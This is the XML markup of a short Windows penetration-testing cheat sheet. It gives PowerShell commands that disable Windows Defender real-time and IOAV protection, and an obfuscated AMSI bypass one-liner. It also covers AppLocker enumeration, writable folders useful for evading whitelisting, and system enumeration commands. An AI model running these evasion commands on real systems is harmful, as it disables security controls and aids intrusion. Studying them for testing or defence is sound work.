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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI" w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Antivirus &amp; Detections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Windows Defender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># check status of Defender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>PS C:\&gt; Get-MpComputerStatus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># disable Real Time Monitoring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>PS C:\&gt; Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus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>PS C:\&gt; Set-MpPreference -DisableIOAVProtection $true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AppLocker Enumeration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With the GPO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HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).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List AppLocker rules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>PS C:\&gt; $a = Get-ApplockerPolicy -effective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>PS C:\&gt; $a.rulecollections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Powershell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Default powershell locations in a Windows system.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>C:\windows\syswow64\windowspowershell\v1.0\powershell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>C:\Windows\System32\WindowsPowerShell\v1.0\powershell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Example of AMSI Bypass.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>PS C:\&gt; [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)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Default Writeable Folders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>C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys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>C:\Windows\System32\spool\drivers\color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>C:\Windows\Tasks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>C:\windows\tracing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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI" w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Windows Version and Configuration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>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"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Extract patchs and updates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>wmic qfe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Architecture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>wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%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List all env variables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>set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>Get-ChildItem Env: | ft Key,Value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List all drives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>wmic logicaldisk get caption || fsutil fsinfo drives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>wmic logicaldisk get caption,description,providername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>Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root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b44fb9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b44fb9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44fb9"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Plk" w:customStyle="1">
    <w:name w:val="pl-k"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00b44fb9"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Pls" w:customStyle="1">
    <w:name w:val="pl-s"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00b44fb9"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Plpds" w:customStyle="1">
    <w:name w:val="pl-pds"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00b44fb9"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Plc1" w:customStyle="1">
    <w:name w:val="pl-c1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00b44fb9"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Plsmi" w:customStyle="1">
    <w:name w:val="pl-smi"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00b44fb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44fb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44fb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LibreOffice/7.0.3.1$Linux_X86_64 LibreOffice_project/00$Build-1</Application>
  <Pages>2</Pages>
  <Words>139</Words>
  <Characters>1311</Characters>
  <CharactersWithSpaces>1411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2021-03-12T16:00:00Z</dcterms:created>
  <dc:creator>Oscar Ogando</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-16T21:18:51Z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